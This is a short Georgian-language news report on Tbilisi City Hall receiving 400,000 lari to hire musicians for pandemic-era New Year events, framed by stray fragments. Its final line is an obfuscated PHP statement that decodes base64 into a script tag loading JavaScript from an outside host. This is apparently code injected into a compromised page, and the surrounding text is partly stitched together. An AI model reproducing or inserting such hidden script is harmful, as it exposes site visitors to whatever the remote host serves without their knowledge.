celsiusi
ავერსი შნაიდერი
ეკონომიკის მინისტრის ნათია თურნავას თქმით, თბილისის მერიას 400 ათასი ლარი გამოეყოფა იმისთვის, რომ საახალწლო კონცერტებში კულტურის მუშაკები დაასაქმოს.
 
თურნავამ სხდომაზე განაცხადა, რომ საბჭომ დღევანდელ შეხვედრაზე იმ მუსიკოსებზეც იმსჯელა, ვისთვისაც კორონავირუსი გამოწვევაა.
 
მან განმარტა, რომ პანდემიამდე პერიოდში ისინი აქტიურად მონაწილეობდნენ სხვადასხვა ღონისძიებებში, ახლა კი მათ ეს შესაძლებლობა და შემოსავლის წყარო აღარ აქვთ.
 
„მივიღეთ გადაწყვეტილება და ქალაქ თბილისისი მერიას გამოეყოფა 400 ათასი ლარი ასიგნება, იმისთვის, რომ მან ჩართოს თავის მიერ ორგანიზებულ საახალწლო ღონისძიებებში რაც შეიძლება მეტი კულტურის მოღვაწე, მუსიკოსები, ვინც სხვაგვარად ამ შესაძლებლობას მოკლებული არიან“, - განაცხადა მან.
 
თურნავამ ასევე ისაუბრა იმ საახალწლო ღონისძიებებზე, რომელსაც მერია დისტანციურად გეგმავს და თქვა – „ვფიქრობთ, რომ ძალიან სწორი და კარგი, დროული გადაწყვეტილებაა, რომელიც კულტურის ბევრ მოღვაწეს გაუხარდება,“
 
აღსანიშნავია, რომ დახარჯულ თანხაში ასევე შედის 491 000-ლარიანი კონცერტი, რომელსაც მაყურებელი ვერ დაესწრება და რომელსაც მხოლოდ პირდაპირ ეთერში გადასცემენ.
1814
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");